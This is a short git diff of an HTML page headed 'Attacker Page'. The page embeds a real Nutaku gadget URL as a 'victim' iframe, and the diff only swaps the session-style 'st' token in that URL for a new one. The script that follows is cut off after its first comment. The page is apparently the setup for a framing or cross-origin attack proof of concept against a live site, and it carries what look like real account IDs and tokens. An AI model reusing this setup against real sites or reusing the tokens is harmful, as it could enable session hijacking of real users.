--- a/63826187321312836671273721.html
+++ b/63826187321312836671273721.html
@@ -7,7 +7,7 @@
 <body>
   <h2>Attacker Page</h2>
 
-  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=5luEHDAW69UBkoKmB05WUmVopl4EkglsoPFDYGXaKuqM0hvrcJ5HxnaoBPi2J4ibhFop00dPHKRGDatuyokda79AoJ67qdBrneR6%2FaTkFPHwkjkXfeSjYy46KInpWspqpJpiEa%2Bb59pc4LOABDav9dYuCjpk5EC6HqLINA4aPwN33eZvYumgIlM%2F%2FYPMbbLZxUgQbgK8rDLm32hYzQJO45u%2BqHtePiUP54qSm0OIOCT4AIbXNhJxJoCsqRZ%2BFnRscxPurfwKNYRpTFZlsrt87mskWz0%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
+  <iframe id="victim" src="https://osapi.nutaku.com/gadgets/ifr?synd=nutaku&container=nutaku&country=US&lang=en&mid=1&owner=173250875&viewer=173250875&aid=267592&tid=demon-lords-career-change-x&view=canvas&parent=https%3A%2F%2Fwww.nutaku.net&noinfo=0&nocache=0&debug=1&view-params=&st=%2BrGfTW8Ww6S0L2kI9hhsHtomsEeSJgrrUynAVACnF3QQ3zseIvRP8Sr1I5%2BK5cNrje85Ya7Zac93YQVwGs%2B%2F6nKY7loIrtXKouX7sF0fox7xUlDzTGugDqzoP4lXTJeXIE9nxWuK1AMz6ujyS%2Fdj%2FGIbprsNQx%2BF1%2BhbiioKCkuUbt8yvY6HE5CQ%2BddocGzv58hOAyL5WfhmxpzLP5b2%2FL6kHleq6jnibcJCpswnymL72iNWsd5PLiu3ILtXlP2RqhX%2Fs0i33DK7mkrbvpYUfR4HPME%3D&domain=https%3A%2F%2Fwww.nutaku.net"></iframe>
 
   <script>
     // Wait until the iframe loads
